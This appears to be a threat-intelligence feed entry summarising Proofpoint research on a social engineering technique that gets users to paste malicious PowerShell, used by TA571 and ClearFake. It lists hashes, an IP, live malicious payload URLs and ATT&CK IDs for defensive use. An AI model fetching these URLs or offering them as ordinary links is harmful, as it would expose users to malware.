From Clipboard to Compromise: A PowerShell Self-Pwn

June 17, 2024, 11:38 a.m.

Description

This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like DarkGate, Matanbuchus, NetSupport, and various information stealers. Despite requiring significant user interaction, the clever social engineering presents an apparent problem and solution simultaneously, prompting users to act without considering the risks.

External References

https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
https://otx.alienvault.com/pulse/66701c99b54ffc9a9507ce00
Tags
malware
social engineering
powershell
xmrig
darkgate
lumma stealer
matanbuchus
2024-06-17
netsupport
malicious script
jaskago
compromise
amadey loader
vidar stealer

Date

  • Created: June 17, 2024, 11:23 a.m.
  • Published: June 17, 2024, 11:23 a.m.
  • Modified: June 17, 2024, 11:38 a.m.

Indicators

  • 9701fec71e5bbec912f69c8ed63ffb6dba21b9cca7e67da5d60a72139c1795d1
  • 11909c0262563f29d28312baffb7ff027f113512c5a76bab7c5870f348ff778f
  • 07e0c15adc6fcf6096dd5b0b03c20145171c00afe14100468f18f01876457c80
  • 91.222.173.113
  • https://rtattack.baqebei1.online/df/tt
  • https://oazevents.com/loader.html
  • https://lashakhazhalia86dancer.com/c.txt
  • https://kostumn1.ilabserver.com/1.zip
  • https://cdn3535.shop/1.zip
  • http://languangjob.com/pandstvx
  • https://jenniferwelsh.com/header.png
  • http://mylittlecabbage.net/xcdttafq
  • http://mylittlecabbage.net/qhsddxna
  • rechtsanwalt@ra-silberkuhl.com
Download all indicators here!

Attack Patterns

  • JaskaGO
  • Vidar Stealer
  • Amadey Loader
  • Matanbuchus
  • Lumma Stealer
  • DarkGate
  • XMRig
  • NetSupport
  • TA571
  • T1028
  • T1557.002
  • T1193
  • T1053.005
  • T1059.001
  • T1486
  • T1105
  • T1027
  • T1059